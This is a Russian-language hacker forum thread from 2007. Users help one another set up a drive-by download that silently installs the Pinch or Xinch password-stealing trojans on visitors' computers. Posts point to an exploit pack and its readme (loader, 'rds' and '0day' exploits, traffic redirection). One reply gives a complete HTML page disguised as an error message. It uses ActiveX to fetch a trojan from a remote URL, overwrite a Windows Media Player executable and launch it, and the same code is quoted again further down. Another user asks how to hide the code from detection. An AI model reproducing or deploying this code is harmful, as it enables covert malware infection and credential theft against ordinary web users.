Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   А возможно ли??? (https://forum.antichat.xyz/showthread.php?t=30940)

*.exe 10.01.2007 15:59
А возможно ли???
 
Всем привет =)

Парни у меня возник вопрос:

Cуществует ли в народе скрипт при попадании на него ЮЗВЕРЯ чтобы на его машину АВТОМАТОМ чтонибудь бы скачалось допустим Pinch или Xinch ???

!!!зарание примного благодарен!!!

GreenBear 10.01.2007 16:04
ога
http://forum.antichat.ru/thread30234.html
=)

blaga 10.01.2007 16:12
Есть еще Веб Атакер. Только он по моему все еще в привате.

aka PSIH 10.01.2007 16:23
Цитата:
Сообщение от blaga
Есть еще Веб Атакер. Только он по моему все еще в привате.
Тот каторый ты у меня спер с флешки пока я пьяный спал... :D

blaga 10.01.2007 16:29
Цитата:
Тот каторый ты у меня спер с флешки пока я пьяный спал...
=\ с диска

_Great_ 10.01.2007 16:46
такой скрипт называется эксплоитом для браузера.

*.exe 10.01.2007 17:24
Парни я правильно понял ? или нет ?

Этот сплойт необходимо разместить на хосте. и када ЮЗЕР на него зайдет к нему на машину скачается тот или иной файл да?
Если я неправ плиз обьяснике =)

aka PSIH 10.01.2007 17:30
Почти, если его браузер подвержен этой уязвимости то жертве загрузиться твой exe

*.exe 10.01.2007 17:46
ок понятненько =)

А ентот СТЛОЙТ на чем написан? на php или html хотя html наврятли помоему верно?

Самый дырявый же у нас IE наскоко мне извесно, получается что и сплойт надыть для IE! но вот токо где взять такой сплойт?

blaga а Веб Атакер это че тоже сплойт?

aka PSIH 10.01.2007 18:34
Цитата:
но вот токо где взять такой сплойт?
Смеешся?
Green_Bear тебе дал ссылку на такой експлойт...

bobob 10.01.2007 18:34
а этот ехе запустится после того как скачается или нах тада такие сплойты?

*.exe 10.01.2007 18:39
Цитата:
Сообщение от aka PSIH
Смеешся?
Green_Bear тебе дал ссылку на такой експлойт...
Блин ну почему сразу смеёшся =(
Заходил я по ентой сылке проходит скока там минуда или 30 сек и выходит ОШИБКА =(

*.exe 10.01.2007 18:44
Усе норм сплойт нашел тут: ---> http://rapidshare.com/files/9520519/sploit.rar.html
За сплойт всем пасибо!!!

парни еще немнохо вопросиков =)

Я тут в редми тыкался и чет никуя непонял некоторых вещей:

Код HTML:
Установка:
1) Скопируйте скрипты на сервер
2) Импортируйте sql.txt в mysql
3) Пропишите настройки в файле inc\config.php
4) Пустите трафф на index.php

Описание:
index.php - скрипт-приемник траффа
load.php - сюда стучит лоадер
exe.php - отсюда лоадер скачивает "exe"
loader.exe - лоадер (замените своим)
rds.js - сплоит rds
FolderIcon.js - сплоит 0day
stat.php - страница статистики.
Код HTML:
Плиз обьясните:
2) Импортируйте sql.txt в mysql 

4) Пустите трафф на index.php <--- Как понять пустите траф?

NOmeR1 10.01.2007 18:56
Пихаешь на сайт с хтмл файл index.html с содержанием :
Код:
<html>
<head>
<title>Error 404</title>
</head>
<body>
</body>
<p><span style="font-size: 11pt">Error 500</span></p>
<p><span style="font-size: 11pt">The page is incorrectly displayed</span></p>
<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>

</p>

</html>
Где ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА там пишешь путь до пинча или ксинча.

bobob 10.01.2007 19:18
ктото ответит на мой вопрос???

пс. и еще вапрос ат навичьга, имха эта палевна такой код могут замедедь, чем скрыть сорз ???

*.exe 10.01.2007 21:17
Цитата:
Сообщение от NOmeR1
Пихаешь на сайт с хтмл файл index.html с содержанием :
Код:
<html>
<head>
<title>Error 404</title>
</head>
<body>
</body>
<p><span style="font-size: 11pt">Error 500</span></p>
<p><span style="font-size: 11pt">The page is incorrectly displayed</span></p>
<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>

</p>

</html>
Где ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА там пишешь путь до пинча или ксинча.

Примного благодарен СПС =)
А вот вопросик: Действительно када трой скачается он автоматом запустится?

NOmeR1 10.01.2007 21:37
Ответ в строчке :
location.href = "mms://";
Короче ДА.

bobob 11.01.2007 04:04
а через вин плеер, так бы и сказали сразу!

*.exe 11.01.2007 12:06
Все парни всем большое спасибо за то что помогли разобратся!
тему можно закрывать.


Время: 21:47